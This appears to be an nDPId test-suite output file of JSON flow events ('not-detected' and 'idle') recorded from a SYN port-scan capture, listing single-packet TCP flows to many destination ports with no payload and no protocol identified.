+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
